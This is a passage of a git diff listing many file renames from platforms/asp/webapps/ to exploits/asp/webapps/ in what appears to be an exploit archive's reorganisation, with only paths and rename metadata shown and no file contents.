b/exploits/asp/webapps/4730.txt similarity index 100% rename from platforms/asp/webapps/4730.txt rename to exploits/asp/webapps/4730.txt diff --git a/platforms/asp/webapps/4824.py b/exploits/asp/webapps/4824.py similarity index 100% rename from platforms/asp/webapps/4824.py rename to exploits/asp/webapps/4824.py diff --git a/platforms/asp/webapps/4848.txt b/exploits/asp/webapps/4848.txt similarity index 100% rename from platforms/asp/webapps/4848.txt rename to exploits/asp/webapps/4848.txt diff --git a/platforms/asp/webapps/4900.txt b/exploits/asp/webapps/4900.txt similarity index 100% rename from platforms/asp/webapps/4900.txt rename to exploits/asp/webapps/4900.txt diff --git a/platforms/asp/webapps/4910.pl b/exploits/asp/webapps/4910.pl similarity index 100% rename from platforms/asp/webapps/4910.pl rename to exploits/asp/webapps/4910.pl diff --git a/platforms/asp/webapps/4921.txt b/exploits/asp/webapps/4921.txt similarity index 100% rename from platforms/asp/webapps/4921.txt rename to exploits/asp/webapps/4921.txt diff --git a/platforms/asp/webapps/4970.txt b/exploits/asp/webapps/4970.txt similarity index 100% rename from platforms/asp/webapps/4970.txt rename to exploits/asp/webapps/4970.txt diff --git a/platforms/asp/webapps/4971.txt b/exploits/asp/webapps/4971.txt similarity index 100% rename from platforms/asp/webapps/4971.txt rename to exploits/asp/webapps/4971.txt diff --git a/platforms/asp/webapps/4972.txt b/exploits/asp/webapps/4972.txt similarity index 100% rename from platforms/asp/webapps/4972.txt rename to exploits/asp/webapps/4972.txt diff --git a/platforms/asp/webapps/4988.txt b/exploits/asp/webapps/4988.txt similarity index 100% rename from platforms/asp/webapps/4988.txt rename to exploits/asp/webapps/4988.txt diff --git a/platforms/asp/webapps/5185.txt b/exploits/asp/webapps/5185.txt similarity index 100% rename from platforms/asp/webapps/5185.txt rename to exploits/asp/webapps/5185.txt diff --git a/platforms/asp/webapps/5187.txt b/exploits/asp/webapps/5187.txt similarity index 100% rename from platforms/asp/webapps/5187.txt rename to exploits/asp/webapps/5187.txt diff --git a/platforms/asp/webapps/5274.txt b/exploits/asp/webapps/5274.txt similarity index 100% rename from platforms/asp/webapps/5274.txt rename to exploits/asp/webapps/5274.txt diff --git a/platforms/asp/webapps/5276.txt b/exploits/asp/webapps/5276.txt similarity index 100% rename from platforms/asp/webapps/5276.txt rename to exploits/asp/webapps/5276.txt diff --git a/platforms/asp/webapps/5286.txt b/exploits/asp/webapps/5286.txt similarity index 100% rename from platforms/asp/webapps/5286.txt rename to exploits/asp/webapps/5286.txt diff --git a/platforms/asp/webapps/5373.txt b/exploits/asp/webapps/5373.txt similarity index 100% rename from platforms/asp/webapps/5373.txt rename to exploits/asp/webapps/5373.txt diff --git a/platforms/asp/webapps/5409.txt b/exploits/asp/webapps/5409.txt similarity index 100% rename from platforms/asp/webapps/5409.txt rename to exploits/asp/webapps/5409.txt diff --git a/platforms/asp/webapps/5456.txt b/exploits/asp/webapps/5456.txt similarity index 100% rename from platforms/asp/webapps/5456.txt rename to exploits/asp/webapps/5456.txt diff --git a/platforms/asp/webapps/5475.txt b/exploits/asp/webapps/5475.txt similarity index 100% rename from platforms/asp/webapps/5475.txt rename to exploits/asp/webapps/5475.txt diff --git a/platforms/asp/webapps/5482.py b/exploits/asp/webapps/5482.py similarity index 100% rename from platforms/asp/webapps/5482.py rename to exploits/asp/webapps/5482.py diff --git a/platforms/asp/webapps/5503.txt b/exploits/asp/webapps/5503.txt similarity index 100% rename from platforms/asp/webapps/5503.txt rename to exploits/asp/webapps/5503.txt diff --git a/platforms/asp/webapps/5507.txt b/exploits/asp/webapps/5507.txt similarity index 100% rename from platforms/asp/webapps/5507.txt rename to exploits/asp/webapps/5507.txt diff --git a/platforms/asp/webapps/5553.txt b/exploits/asp/webapps/5553.txt similarity index 100% rename from platforms/asp/webapps/5553.txt rename to exploits/asp/webapps/5553.txt diff --git a/platforms/asp/webapps/5556.txt b/exploits/asp/webapps/5556.txt similarity index 100% rename from platforms/asp/webapps/5556.txt rename to exploits/asp/webapps/5556.txt diff --git a/platforms/asp/webapps/5564.txt b/exploits/asp/webapps/5564.txt similarity index 100% rename from platforms/asp/webapps/5564.txt rename to exploits/asp/webapps/5564.txt diff --git a/platforms/asp/webapps/5608.txt b/exploits/asp/webapps/5608.txt similarity index 100% rename from platforms/asp/webapps/5608.txt rename to exploits/asp/webapps/5608.txt diff --git a/platforms/asp/webapps/5633.pl b/exploits/asp/webapps/5633.pl similarity index 100% rename from platforms/asp/webapps/5633.pl rename to exploits/asp/webapps/5633.pl diff --git a/platforms/asp/webapps/5705.txt b/exploits/asp/webapps/5705.txt similarity index 100% rename from platforms/asp/webapps/5705.txt rename to exploits/asp/webapps/5705.txt diff --git a/platforms/asp/webapps/5717.txt b/exploits/asp/webapps/5717.txt similarity index 100% rename from platforms/asp/webapps/5717.txt rename to exploits/asp/webapps/5717.txt diff --git a/platforms/asp/webapps/5753.txt b/exploits/asp/webapps/5753.txt similarity index 100% rename from platforms/asp/webapps/5753.txt rename to exploits/asp/webapps/5753.txt diff --git a/platforms/asp/webapps/5763.txt b/exploits/asp/webapps/5763.txt similarity index 100% rename from platforms/asp/webapps/5763.txt rename to exploits/asp/webapps/5763.txt diff --git a/platforms/asp/webapps/5765.txt b/exploits/asp/webapps/5765.txt similarity index 100% rename from platforms/asp/webapps/5765.txt rename to exploits/asp/webapps/5765.txt diff --git a/platforms/asp/webapps/5775.txt b/exploits/asp/webapps/5775.txt similarity index 100% rename from platforms/asp/webapps/5775.txt rename to exploits/asp/webapps/5775.txt diff --git a/platforms/asp/webapps/5780.txt b/exploits/asp/webapps/5780.txt similarity index 100% rename from platforms/asp/webapps/5780.txt rename to exploits/asp/webapps/5780.txt diff --git a/platforms/asp/webapps/5781.txt b/exploits/asp/webapps/5781.txt similarity index 100% rename from platforms/asp/webapps/5781.txt rename to exploits/asp/webapps/5781.txt diff --git a/platforms/asp/webapps/5805.txt b/exploits/asp/webapps/5805.txt similarity index 100% rename from platforms/asp/webapps/5805.txt rename to exploits/asp/webapps/5805.txt diff --git a/platforms/asp/webapps/5849.txt b/exploits/asp/webapps/5849.txt similarity index 100% rename from platforms/asp/webapps/5849.txt rename to exploits/asp/webapps/5849.txt diff --git a/platforms/asp/webapps/5850.txt b/exploits/asp/webapps/5850.txt similarity index 100% rename from platforms/asp/webapps/5850.txt rename to exploits/asp/webapps/5850.txt diff --git a/platforms/asp/webapps/5869.txt b/exploits/asp/webapps/5869.txt similarity index 100% rename from platforms/asp/webapps/5869.txt rename to exploits/asp/webapps/5869.txt diff --git a/platforms/asp/webapps/5894.txt b/exploits/asp/webapps/5894.txt similarity index 100% rename from platforms/asp/webapps/5894.txt rename to exploits/asp/webapps/5894.txt diff --git a/platforms/asp/webapps/5912.txt b/exploits/asp/webapps/5912.txt similarity index 100% rename from platforms/asp/webapps/5912.txt rename to exploits/asp/webapps/5912.txt diff --git a/platforms/asp/webapps/5927.txt b/exploits/asp/webapps/5927.txt similarity index 100% rename from platforms/asp/webapps/5927.txt rename to exploits/asp/webapps/5927.txt diff --git a/platforms/asp/webapps/6104.pl b/exploits/asp/webapps/6104.pl similarity index 100% rename from platforms/asp/webapps/6104.pl rename to exploits/asp/webapps/6104.pl diff --git a/platforms/asp/webapps/6105.pl b/exploits/asp/webapps/6105.pl similarity index 100% rename from platforms/asp/webapps/6105.pl rename to exploits/asp/webapps/6105.pl diff --git a/platforms/asp/webapps/6119.txt b/exploits/asp/webapps/6119.txt similarity index 100% rename from platforms/asp/webapps/6119.txt rename to exploits/asp/webapps/6119.txt diff --git a/platforms/asp/webapps/6135.txt b/exploits/asp/webapps/6135.txt similarity index 100% rename from platforms/asp/webapps/6135.txt rename to exploits/asp/webapps/6135.txt diff --git a/platforms/asp/webapps/6405.txt b/exploits/asp/webapps/6405.txt similarity index 100% rename from platforms/asp/webapps/6405.txt rename to exploits/asp/webapps/6405.txt diff --git a/platforms/asp/webapps/6420.txt b/exploits/asp/webapps/6420.txt similarity index 100% rename from platforms/asp/webapps/6420.txt rename to exploits/asp/webapps/6420.txt diff --git a/platforms/asp/webapps/6453.txt b/exploits/asp/webapps/6453.txt similarity index 100% rename from platforms/asp/webapps/6453.txt rename to exploits/asp/webapps/6453.txt diff --git a/platforms/asp/webapps/6470.txt b/exploits/asp/webapps/6470.txt similarity index 100% rename from platforms/asp/webapps/6470.txt rename to exploits/asp/webapps/6470.txt diff --git a/platforms/asp/webapps/6610.txt b/exploits/asp/webapps/6610.txt similarity index 100% rename from platforms/asp/webapps/6610.txt rename to exploits/asp/webapps/6610.txt diff --git a/platforms/asp/webapps/6720.txt b/exploits/asp/webapps/6720.txt similarity index 100% rename from platforms/asp/webapps/6720.txt rename to exploits/asp/webapps/6720.txt diff --git a/platforms/asp/webapps/6725.txt b/exploits/asp/webapps/6725.txt similarity index 100% rename from platforms/asp/webapps/6725.txt rename to exploits/asp/webapps/6725.txt diff --git a/platforms/asp/webapps/6731.txt b/exploits/asp/webapps/6731.txt similarity index 100% rename from platforms/asp/webapps/6731.txt rename to exploits/asp/webapps/6731.txt diff --git a/platforms/asp/webapps/6810.txt b/exploits/asp/webapps/6810.txt similarity index 100% rename from platforms/asp/webapps/6810.txt rename to exploits/asp/webapps/6810.txt diff --git a/platforms/asp/webapps/7067.txt b/exploits/asp/webapps/7067.txt similarity index 100% rename from platforms/asp/webapps/7067.txt rename to exploits/asp/webapps/7067.txt diff --git a/platforms/asp/webapps/7120.txt b/exploits/asp/webapps/7120.txt similarity index 100% rename from platforms/asp/webapps/7120.txt rename to exploits/asp/webapps/7120.txt diff --git a/platforms/asp/webapps/7137.txt b/exploits/asp/webapps/7137.txt similarity index 100% rename from platforms/asp/webapps/7137.txt rename to exploits/asp/webapps/7137.txt diff --git a/platforms/asp/webapps/7141.txt b/exploits/asp/webapps/7141.txt similarity index 100% rename from platforms/asp/webapps/7141.txt rename to exploits/asp/webapps/7141.txt diff --git a/platforms/asp/webapps/7259.txt b/exploits/asp/webapps/7259.txt similarity index 100% rename from platforms/asp/webapps/7259.txt rename to exploits/asp/webapps/7259.txt diff --git a/platforms/asp/webapps/7273.txt b/exploits/asp/webapps/7273.txt similarity index 100% rename from platforms/asp/webapps/7273.txt rename to exploits/asp/webapps/7273.txt diff --git a/platforms/asp/webapps/7274.txt b/exploits/asp/webapps/7274.txt similarity index 100% rename from platforms/asp/webapps/7274.txt rename to exploits/asp/webapps/7274.txt diff --git a/platforms/asp/webapps/7275.txt b/exploits/asp/webapps/7275.txt similarity index 100% rename from platforms/asp/webapps/7275.txt rename to exploits/asp/webapps/7275.txt diff --git a/platforms/asp/webapps/7276.txt b/exploits/asp/webapps/7276.txt similarity index 100% rename from platforms/asp/webapps/7276.txt rename to exploits/asp/webapps/7276.txt diff --git a/platforms/asp/webapps/7277.txt b/exploits/asp/webapps/7277.txt similarity index 100% rename from platforms/asp/webapps/7277.txt rename to exploits/asp/webapps/7277.txt diff --git a/platforms/asp/webapps/7278.txt b/exploits/asp/webapps/7278.txt similarity index 100% rename from platforms/asp/webapps/7278.txt rename to exploits/asp/webapps/7278.txt diff --git a/platforms/asp/webapps/7279.txt b/exploits/asp/webapps/7279.txt similarity index 100% rename from platforms/asp/webapps/7279.txt rename to exploits/asp/webapps/7279.txt diff --git a/platforms/asp/webapps/7280.txt b/exploits/asp/webapps/7280.txt similarity index 100% rename from platforms/asp/webapps/7280.txt rename to exploits/asp/webapps/7280.txt diff --git a/platforms/asp/webapps/7281.txt b/exploits/asp/webapps/7281.txt similarity index 100% rename from platforms/asp/webapps/7281.txt rename to exploits/asp/webapps/7281.txt diff --git a/platforms/asp/webapps/7282.txt b/exploits/asp/webapps/7282.txt similarity index 100% rename from platforms/asp/webapps/7282.txt rename to exploits/asp/webapps/7282.txt diff --git a/platforms/asp/webapps/7283.txt b/exploits/asp/webapps/7283.txt similarity index 100% rename from platforms/asp/webapps/7283.txt rename to exploits/asp/webapps/7283.txt diff --git a/platforms/asp/webapps/7287.txt b/exploits/asp/webapps/7287.txt similarity index 100% rename from platforms/asp/webapps/7287.txt rename to exploits/asp/webapps/7287.txt diff --git a/platforms/asp/webapps/7288.txt b/exploits/asp/webapps/7288.txt similarity index 100% rename from platforms/asp/webapps/7288.txt rename to exploits/asp/webapps/7288.txt diff --git a/platforms/asp/webapps/7292.txt b/exploits/asp/webapps/7292.txt similarity index 100% rename from platforms/asp/webapps/7292.txt rename to exploits/asp/webapps/7292.txt diff --git a/platforms/asp/webapps/7293.txt b/exploits/asp/webapps/7293.txt similarity index 100% rename from platforms/asp/webapps/7293.txt rename to exploits/asp/webapps/7293.txt diff --git a/platforms/asp/webapps/7295.txt b/exploits/asp/webapps/7295.txt similarity index 100% rename from platforms/asp/webapps/7295.txt rename to exploits/asp/webapps/7295.txt diff --git a/platforms/asp/webapps/7316.txt b/exploits/asp/webapps/7316.txt similarity index 100% rename from platforms/asp/webapps/7316.txt rename to exploits/asp/webapps/7316.txt diff --git a/platforms/asp/webapps/7325.txt b/exploits/asp/webapps/7325.txt similarity index 100% rename from platforms/asp/webapps/7325.txt rename to exploits/asp/webapps/7325.txt diff --git a/platforms/asp/webapps/7326.txt b/exploits/asp/webapps/7326.txt similarity index 100% rename from platforms/asp/webapps/7326.txt rename to exploits/asp/webapps/7326.txt diff --git a/platforms/asp/webapps/7327.txt b/exploits/asp/webapps/7327.txt similarity index 100% rename from platforms/asp/webapps/7327.txt rename to exploits/asp/webapps/7327.txt diff --git a/platforms/asp/webapps/7340.txt b/exploits/asp/webapps/7340.txt similarity index 100% rename from platforms/asp/webapps/7340.txt rename to exploits/asp/webapps/7340.txt diff --git a/platforms/asp/webapps/7348.txt b/exploits/asp/webapps/7348.txt similarity index 100% rename from platforms/asp/webapps/7348.txt rename to exploits/asp/webapps/7348.txt diff --git a/platforms/asp/webapps/7349.txt b/exploits/asp/webapps/7349.txt similarity index 100% rename from platforms/asp/webapps/7349.txt rename to exploits/asp/webapps/7349.txt diff --git a/platforms/asp/webapps/7350.txt b/exploits/asp/webapps/7350.txt similarity index 100% rename from platforms/asp/webapps/7350.txt rename to exploits/asp/webapps/7350.txt diff --git a/platforms/asp/webapps/7353.txt b/exploits/asp/webapps/7353.txt similarity index 100% rename from platforms/asp/webapps/7353.txt rename to exploits/asp/webapps/7353.txt diff --git a/platforms/asp/webapps/7356.txt b/exploits/asp/webapps/7356.txt similarity index 100% rename from platforms/asp/webapps/7356.txt rename to exploits/asp/webapps/7356.txt diff --git a/platforms/asp/webapps/7357.txt b/exploits/asp/webapps/7357.txt similarity index 100% rename from platforms/asp/webapps/7357.txt rename to exploits/asp/webapps/7357.txt diff --git a/platforms/asp/webapps/7359.txt b/exploits/asp/webapps/7359.txt similarity index 100% rename from platforms/asp/webapps/7359.txt rename to exploits/asp/webapps/7359.txt diff --git a/platforms/asp/webapps/7360.txt b/exploits/asp/webapps/7360.txt similarity index 100% rename from platforms/asp/webapps/7360.txt rename to exploits/asp/webapps/7360.txt diff --git a/platforms/asp/webapps/7361.txt b/exploits/asp/webapps/7361.txt similarity index 100% rename from platforms/asp/webapps/7361.txt rename to exploits/asp/webapps/7361.txt diff --git a/platforms/asp/webapps/7370.txt b/exploits/asp/webapps/7370.txt similarity index 100% rename from platforms/asp/webapps/7370.txt rename to exploits/asp/webapps/7370.txt diff --git a/platforms/asp/webapps/7371.txt b/exploits/asp/webapps/7371.txt similarity index 100% rename from platforms/asp/webapps/7371.txt rename to exploits/asp/webapps/7371.txt diff --git a/platforms/asp/webapps/7372.txt b/exploits/asp/webapps/7372.txt similarity index 100% rename from platforms/asp/webapps/7372.txt rename to exploits/asp/webapps/7372.txt diff --git a/platforms/asp/webapps/7373.txt b/exploits/asp/webapps/7373.txt similarity index 100% rename from platforms/asp/webapps/7373.txt rename to exploits/asp/webapps/7373.txt diff --git a/platforms/asp/webapps/7376.txt b/exploits/asp/webapps/7376.txt similarity index 100% rename from platforms/asp/webapps/7376.txt rename to exploits/asp/webapps/7376.txt diff --git a/platforms/asp/webapps/7378.txt b/exploits/asp/webapps/7378.txt similarity index 100% rename from platforms/asp/webapps/7378.txt rename to exploits/asp/webapps/7378.txt diff --git a/platforms/asp/webapps/7390.txt b/exploits/asp/webapps/7390.txt similarity index 100% rename from platforms/asp/webapps/7390.txt rename to exploits/asp/webapps/7390.txt diff --git a/platforms/asp/webapps/7391.txt b/exploits/asp/webapps/7391.txt similarity index 100% rename from platforms/asp/webapps/7391.txt rename to exploits/asp/webapps/7391.txt diff --git a/platforms/asp/webapps/7398.txt b/exploits/asp/webapps/7398.txt similarity index 100% rename from platforms/asp/webapps/7398.txt rename to exploits/asp/webapps/7398.txt diff --git a/platforms/asp/webapps/7412.txt b/exploits/asp/webapps/7412.txt similarity index 100% rename from platforms/asp/webapps/7412.txt rename to exploits/asp/webapps/7412.txt diff --git a/platforms/asp/webapps/7413.pl b/exploits/asp/webapps/7413.pl similarity index 100% rename from platforms/asp/webapps/7413.pl rename to exploits/asp/webapps/7413.pl diff --git a/platforms/asp/webapps/7414.txt b/exploits/asp/webapps/7414.txt similarity index 100% rename from platforms/asp/webapps/7414.txt rename to exploits/asp/webapps/7414.txt diff --git a/platforms/asp/webapps/7415.txt b/exploits/asp/webapps/7415.txt similarity index 100% rename from platforms/asp/webapps/7415.txt rename to exploits/asp/webapps/7415.txt diff --git a/platforms/asp/webapps/7416.txt b/exploits/asp/webapps/7416.txt similarity index 100% rename from platforms/asp/webapps/7416.txt rename to exploits/asp/webapps/7416.txt diff --git a/platforms/asp/webapps/7419.txt b/exploits/asp/webapps/7419.txt similarity index 100% rename from platforms/asp/webapps/7419.txt rename to exploits/asp/webapps/7419.txt diff --git a/platforms/asp/webapps/7420.txt b/exploits/asp/webapps/7420.txt similarity index 100% rename from platforms/asp/webapps/7420.txt rename to exploits/asp/webapps/7420.txt diff --git a/platforms/asp/webapps/7423.txt b/exploits/asp/webapps/7423.txt similarity index 100% rename from platforms/asp/webapps/7423.txt rename to exploits/asp/webapps/7423.txt diff --git a/platforms/asp/webapps/7424.txt b/exploits/asp/webapps/7424.txt similarity index 100% rename from platforms/asp/webapps/7424.txt rename to exploits/asp/webapps/7424.txt diff --git a/platforms/asp/webapps/7425.txt b/exploits/asp/webapps/7425.txt similarity index 100% rename from platforms/asp/webapps/7425.txt rename to exploits/asp/webapps/7425.txt diff --git a/platforms/asp/webapps/7427.txt b/exploits/asp/webapps/7427.txt similarity index 100% rename from platforms/asp/webapps/7427.txt rename to exploits/asp/webapps/7427.txt diff --git a/platforms/asp/webapps/7428.txt b/exploits/asp/webapps/7428.txt similarity index 100% rename from platforms/asp/webapps/7428.txt rename to exploits/asp/webapps/7428.txt diff --git a/platforms/asp/webapps/7429.txt b/exploits/asp/webapps/7429.txt similarity index 100% rename from platforms/asp/webapps/7429.txt rename to exploits/asp/webapps/7429.txt diff --git a/platforms/asp/webapps/7436.txt b/exploits/asp/webapps/7436.txt similarity index 100% rename from platforms/asp/webapps/7436.txt rename to exploits/asp/webapps/7436.txt diff --git a/platforms/asp/webapps/7438.txt b/exploits/asp/webapps/7438.txt similarity index 100% rename from platforms/asp/webapps/7438.txt rename to exploits/asp/webapps/7438.txt diff --git a/platforms/asp/webapps/7440.txt b/exploits/asp/webapps/7440.txt similarity index 100% rename from platforms/asp/webapps/7440.txt rename to exploits/asp/webapps/7440.txt diff --git a/platforms/asp/webapps/7445.txt b/exploits/asp/webapps/7445.txt similarity index 100% rename from platforms/asp/webapps/7445.txt rename to exploits/asp/webapps/7445.txt diff --git a/platforms/asp/webapps/7446.txt b/exploits/asp/webapps/7446.txt similarity index 100% rename from platforms/asp/webapps/7446.txt rename to exploits/asp/webapps/7446.txt diff --git a/platforms/asp/webapps/7447.txt b/exploits/asp/webapps/7447.txt similarity index 100% rename from platforms/asp/webapps/7447.txt rename to exploits/asp/webapps/7447.txt diff --git a/platforms/asp/webapps/7450.txt b/exploits/asp/webapps/7450.txt similarity index 100% rename from platforms/asp/webapps/7450.txt rename to exploits/asp/webapps/7450.txt diff --git a/platforms/asp/webapps/7462.txt b/exploits/asp/webapps/7462.txt similarity index 100% rename from platforms/asp/webapps/7462.txt rename to exploits/asp/webapps/7462.txt diff --git a/platforms/asp/webapps/7464.txt b/exploits/asp/webapps/7464.txt similarity index 100% rename from platforms/asp/webapps/7464.txt rename to exploits/asp/webapps/7464.txt diff --git a/platforms/asp/webapps/7466.txt b/exploits/asp/webapps/7466.txt similarity index 100% rename from platforms/asp/webapps/7466.txt rename to exploits/asp/webapps/7466.txt diff --git a/platforms/asp/webapps/7468.txt b/exploits/asp/webapps/7468.txt similarity index 100% rename from platforms/asp/webapps/7468.txt rename to exploits/asp/webapps/7468.txt diff --git a/platforms/asp/webapps/7469.txt b/exploits/asp/webapps/7469.txt similarity index 100% rename from platforms/asp/webapps/7469.txt rename to exploits/asp/webapps/7469.txt diff --git a/platforms/asp/webapps/7470.txt b/exploits/asp/webapps/7470.txt similarity index 100% rename from platforms/asp/webapps/7470.txt rename to exploits/asp/webapps/7470.txt diff --git a/platforms/asp/webapps/7471.txt b/exploits/asp/webapps/7471.txt similarity index 100% rename from platforms/asp/webapps/7471.txt rename to exploits/asp/webapps/7471.txt diff --git a/platforms/asp/webapps/7472.txt b/exploits/asp/webapps/7472.txt similarity index 100% rename from platforms/asp/webapps/7472.txt rename to exploits/asp/webapps/7472.txt diff --git a/platforms/asp/webapps/7484.txt b/exploits/asp/webapps/7484.txt similarity index 100% rename from platforms/asp/webapps/7484.txt rename to exploits/asp/webapps/7484.txt diff --git a/platforms/asp/webapps/7485.txt b/exploits/asp/webapps/7485.txt similarity index 100% rename from platforms/asp/webapps/7485.txt rename to exploits/asp/webapps/7485.txt diff --git a/platforms/asp/webapps/7486.txt b/exploits/asp/webapps/7486.txt similarity index 100% rename from platforms/asp/webapps/7486.txt rename to exploits/asp/webapps/7486.txt diff --git a/platforms/asp/webapps/7488.txt b/exploits/asp/webapps/7488.txt similarity index 100% rename from platforms/asp/webapps/7488.txt rename to exploits/asp/webapps/7488.txt diff --git a/platforms/asp/webapps/7491.txt b/exploits/asp/webapps/7491.txt similarity index 100% rename from platforms/asp/webapps/7491.txt rename to exploits/asp/webapps/7491.txt diff --git a/platforms/asp/webapps/7495.txt b/exploits/asp/webapps/7495.txt similarity index 100% rename from platforms/asp/webapps/7495.txt rename to exploits/asp/webapps/7495.txt diff --git a/platforms/asp/webapps/7499.txt b/exploits/asp/webapps/7499.txt similarity index 100% rename from platforms/asp/webapps/7499.txt rename to exploits/asp/webapps/7499.txt diff --git a/platforms/asp/webapps/7508.txt b/exploits/asp/webapps/7508.txt similarity index 100% rename from platforms/asp/webapps/7508.txt rename to exploits/asp/webapps/7508.txt diff --git a/platforms/asp/webapps/7534.txt b/exploits/asp/webapps/7534.txt similarity index 100% rename from platforms/asp/webapps/7534.txt rename to exploits/asp/webapps/7534.txt diff --git a/platforms/asp/webapps/7599.txt b/exploits/asp/webapps/7599.txt similarity index 100% rename from platforms/asp/webapps/7599.txt rename to exploits/asp/webapps/7599.txt diff --git a/platforms/asp/webapps/7609.txt b/exploits/asp/webapps/7609.txt similarity index 100% rename from platforms/asp/webapps/7609.txt rename to exploits/asp/webapps/7609.txt diff --git a/platforms/asp/webapps/7610.txt b/exploits/asp/webapps/7610.txt similarity index 100% rename from platforms/asp/webapps/7610.txt rename to exploits/asp/webapps/7610.txt diff --git a/platforms/asp/webapps/7613.txt b/exploits/asp/webapps/7613.txt similarity index 100% rename from platforms/asp/webapps/7613.txt rename to exploits/asp/webapps/7613.txt diff --git a/platforms/asp/webapps/7627.txt b/exploits/asp/webapps/7627.txt similarity index 100% rename from platforms/asp/webapps/7627.txt rename to exploits/asp/webapps/7627.txt diff --git a/platforms/asp/webapps/7665.txt b/exploits/asp/webapps/7665.txt similarity index 100% rename from platforms/asp/webapps/7665.txt rename to exploits/asp/webapps/7665.txt diff --git a/platforms/asp/webapps/7666.txt b/exploits/asp/webapps/7666.txt similarity index 100% rename from platforms/asp/webapps/7666.txt rename to exploits/asp/webapps/7666.txt diff --git a/platforms/asp/webapps/7736.html b/exploits/asp/webapps/7736.html similarity index 100% rename from platforms/asp/webapps/7736.html rename to exploits/asp/webapps/7736.html diff --git a/platforms/asp/webapps/7741.txt b/exploits/asp/webapps/7741.txt similarity index 100% rename from platforms/asp/webapps/7741.txt rename to exploits/asp/webapps/7741.txt diff --git a/platforms/asp/webapps/7744.txt b/exploits/asp/webapps/7744.txt similarity index 100% rename from platforms/asp/webapps/7744.txt rename to exploits/asp/webapps/7744.txt diff --git a/platforms/asp/webapps/7752.txt b/exploits/asp/webapps/7752.txt similarity index 100% rename from platforms/asp/webapps/7752.txt rename to exploits/asp/webapps/7752.txt diff --git a/platforms/asp/webapps/7754.txt b/exploits/asp/webapps/7754.txt similarity index 100% rename from platforms/asp/webapps/7754.txt rename to exploits/asp/webapps/7754.txt diff --git a/platforms/asp/webapps/7761.txt b/exploits/asp/webapps/7761.txt similarity index 100% rename from platforms/asp/webapps/7761.txt rename to exploits/asp/webapps/7761.txt diff --git a/platforms/asp/webapps/7766.txt b/exploits/asp/webapps/7766.txt similarity index 100% rename from platforms/asp/webapps/7766.txt rename to exploits/asp/webapps/7766.txt diff --git a/platforms/asp/webapps/7767.txt b/exploits/asp/webapps/7767.txt similarity index 100% rename from platforms/asp/webapps/7767.txt rename to exploits/asp/webapps/7767.txt diff --git a/platforms/asp/webapps/7768.txt b/exploits/asp/webapps/7768.txt similarity index 100% rename from platforms/asp/webapps/7768.txt rename to exploits/asp/webapps/7768.txt diff --git a/platforms/asp/webapps/7769.txt b/exploits/asp/webapps/7769.txt similarity index 100% rename from platforms/asp/webapps/7769.txt rename to exploits/asp/webapps/7769.txt diff --git a/platforms/asp/webapps/7770.txt b/exploits/asp/webapps/7770.txt similarity index 100% rename from platforms/asp/webapps/7770.txt rename to exploits/asp/webapps/7770.txt diff --git a/platforms/asp/webapps/7771.txt b/exploits/asp/webapps/7771.txt similarity index 100% rename from platforms/asp/webapps/7771.txt rename to exploits/asp/webapps/7771.txt diff --git a/platforms/asp/webapps/7772.txt b/exploits/asp/webapps/7772.txt similarity index 100% rename from platforms/asp/webapps/7772.txt rename to exploits/asp/webapps/7772.txt diff --git a/platforms/asp/webapps/7773.txt b/exploits/asp/webapps/7773.txt similarity index 100% rename from platforms/asp/webapps/7773.txt rename to exploits/asp/webapps/7773.txt diff --git a/platforms/asp/webapps/7774.txt b/exploits/asp/webapps/7774.txt similarity index 100% rename from platforms/asp/webapps/7774.txt rename to exploits/asp/webapps/7774.txt diff --git a/platforms/asp/webapps/7782.txt b/exploits/asp/webapps/7782.txt similarity index 100% rename from platforms/asp/webapps/7782.txt rename to exploits/asp/webapps/7782.txt diff --git a/platforms/asp/webapps/7783.txt b/exploits/asp/webapps/7783.txt similarity index 100% rename from platforms/asp/webapps/7783.txt rename to exploits/asp/webapps/7783.txt diff --git a/platforms/asp/webapps/7784.txt b/exploits/asp/webapps/7784.txt similarity index 100% rename from platforms/asp/webapps/7784.txt rename to exploits/asp/webapps/7784.txt diff --git a/platforms/asp/webapps/7788.txt b/exploits/asp/webapps/7788.txt similarity index 100% rename from platforms/asp/webapps/7788.txt rename to exploits/asp/webapps/7788.txt diff --git a/platforms/asp/webapps/7789.txt b/exploits/asp/webapps/7789.txt similarity index 100% rename from platforms/asp/webapps/7789.txt rename to exploits/asp/webapps/7789.txt diff --git a/platforms/asp/webapps/7791.txt b/exploits/asp/webapps/7791.txt similarity index 100% rename from platforms/asp/webapps/7791.txt rename to exploits/asp/webapps/7791.txt diff --git a/platforms/asp/webapps/7800.txt b/exploits/asp/webapps/7800.txt similarity index 100% rename from platforms/asp/webapps/7800.txt rename to exploits/asp/webapps/7800.txt diff --git a/platforms/asp/webapps/7801.txt b/exploits/asp/webapps/7801.txt similarity index 100% rename from platforms/asp/webapps/7801.txt rename to exploits/asp/webapps/7801.txt diff --git a/platforms/asp/webapps/7802.txt b/exploits/asp/webapps/7802.txt similarity index 100% rename from platforms/asp/webapps/7802.txt rename to exploits/asp/webapps/7802.txt diff --git a/platforms/asp/webapps/7803.txt b/exploits/asp/webapps/7803.txt similarity index 100% rename from platforms/asp/webapps/7803.txt rename to exploits/asp/webapps/7803.txt diff --git a/platforms/asp/webapps/7807.txt b/exploits/asp/webapps/7807.txt similarity index 100% rename from platforms/asp/webapps/7807.txt rename to exploits/asp/webapps/7807.txt diff --git a/platforms/asp/webapps/7816.txt b/exploits/asp/webapps/7816.txt similarity index 100% rename from platforms/asp/webapps/7816.txt rename to exploits/asp/webapps/7816.txt diff --git a/platforms/asp/webapps/7850.txt b/exploits/asp/webapps/7850.txt similarity index 100% rename from platforms/asp/webapps/7850.txt rename to exploits/asp/webapps/7850.txt diff --git a/platforms/asp/webapps/7861.txt b/exploits/asp/webapps/7861.txt similarity index 100% rename from platforms/asp/webapps/7861.txt rename to exploits/asp/webapps/7861.txt diff --git a/platforms/asp/webapps/7872.txt b/exploits/asp/webapps/7872.txt similarity index 100% rename from platforms/asp/webapps/7872.txt rename to exploits/asp/webapps/7872.txt diff --git a/platforms/asp/webapps/7924.txt b/exploits/asp/webapps/7924.txt similarity index 100% rename from platforms/asp/webapps/7924.txt rename to exploits/asp/webapps/7924.txt diff --git a/platforms/asp/webapps/7963.txt b/exploits/asp/webapps/7963.txt similarity index 100% rename from platforms/asp/webapps/7963.txt rename to exploits/asp/webapps/7963.txt diff --git a/platforms/asp/webapps/7981.txt b/exploits/asp/webapps/7981.txt similarity index 100% rename from platforms/asp/webapps/7981.txt rename to exploits/asp/webapps/7981.txt diff --git a/platforms/asp/webapps/7982.txt b/exploits/asp/webapps/7982.txt similarity index 100% rename from platforms/asp/webapps/7982.txt rename to 